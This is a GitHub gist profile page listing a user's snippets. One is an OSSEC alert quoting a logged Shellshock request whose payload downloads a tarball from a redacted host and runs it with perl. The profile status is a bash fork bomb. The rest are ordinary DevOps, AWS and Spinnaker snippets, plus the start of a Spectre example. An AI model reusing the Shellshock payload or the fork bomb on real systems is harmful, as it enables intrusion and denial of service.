Skip to content

Instantly share code, notes, and snippets.

View burdzwastaken's full-sized avatar
🌪️
:(){ :|: & };:

Matt Burdan burdzwastaken

🌪️
:(){ :|: & };:
View GitHub Profile
OSSEC HIDS Notification.
2016 Mar 20 09:38:57
Received From: ip->/var/log/nginx/access.log
Rule: 31151 fired (level 10) -> "Multiple web server 400 error codes from same source ip."
Portion of the log(s):
119.188.4.3 - - [20/Mar/2016:09:38:55 +0000] "GET /gitweb/ HTTP/1.1" 404 151 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget http://IP/asd.tar -O /tmp/asd.tar;curl -O /tmp/asd.tar http://IP/asd.tar ; perl /tmp/asd.tar; rm -fr /tmp/asd.tar;rm -rf /tmp/asd.*\x22);'"

Keybase proof

I hereby claim:

  • I am burdzwastaken on github.
  • I am burdz (https://keybase.io/burdz) on keybase.
  • I have a public key whose fingerprint is 3819 91A4 8A07 E659 9716 B2F5 AAAD 9B13 4D3A C027

To claim this, I am signing this object:

# requires docker && docker-compose
mkdir kolide-local && cd kolide-local
echo "
version: '2'
services:
mysql:
image: mysql:5.7
volumes:
import os
import sys
import boto3
def getParameter():
region = sys.argv[1]
param = sys.argv[2]
ssm = boto3.client('ssm',
region_name=region
#include <Windows.h>
int main()
{
for (;;)
if (GetAsyncKeyState(65))
{
mouse_event(2, 0, 0, 0, 1);
mouse_event(4, 0, 0, 0, 1);
Sleep(1);
}
# using grep to restore accidentally deleted txt files from a disk
# create test file
echo -e '#!/bin/bash\necho this is a delete test' >> delete_test.sh
# make it executable && run for a test
chmod +x ./delete_test.sh && ./delete_test.sh
# delete the file
rm -f ./delete_test.sh
@burdzwastaken
burdzwastaken / spectre.c
Last active January 5, 2018 23:49 — forked from ErikAugust/spectre.c
Spectre example code
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
@burdzwastaken
burdzwastaken / lambdaAMICleanup.py
Created September 6, 2017 04:18 — forked from bkozora/lambdaAMICleanup.py
AWS Lambda Function to Delete AMIs and Snapshots
# Automated AMI and Snapshot Deletion
#
# @author Robert Kozora <bobby@kozora.me>
#
# This script will search for all instances having a tag with "Backup" or "backup"
# on it. As soon as we have the instances list, we loop through each instance
# and reference the AMIs of that instance. We check that the latest daily backup
# succeeded then we store every image that's reached its DeleteOn tag's date for
# deletion. We then loop through the AMIs, deregister them and remove all the
# snapshots associated with that AMI.
---
schema: "1"
id: bakeAndTagRoot
metadata:
name: Bake And Tag Pipeline
description: |-
Defines a pipeline that bakes and tags an AMI. This template cannot be used directly.
owner: devops@mulesoft.com
scopes: [global]
protect: false
---
schema: "1"
pipeline:
application: samplespinnakerpipeline
name: Bake samplespinnakerpipeline
template:
source: spinnaker://bakeAndTagRoot
variables:
jenkinsJob: "DevOps/job/mulesoft-ops/job/sample-spinnaker-app/job/master"
extendedAttributes: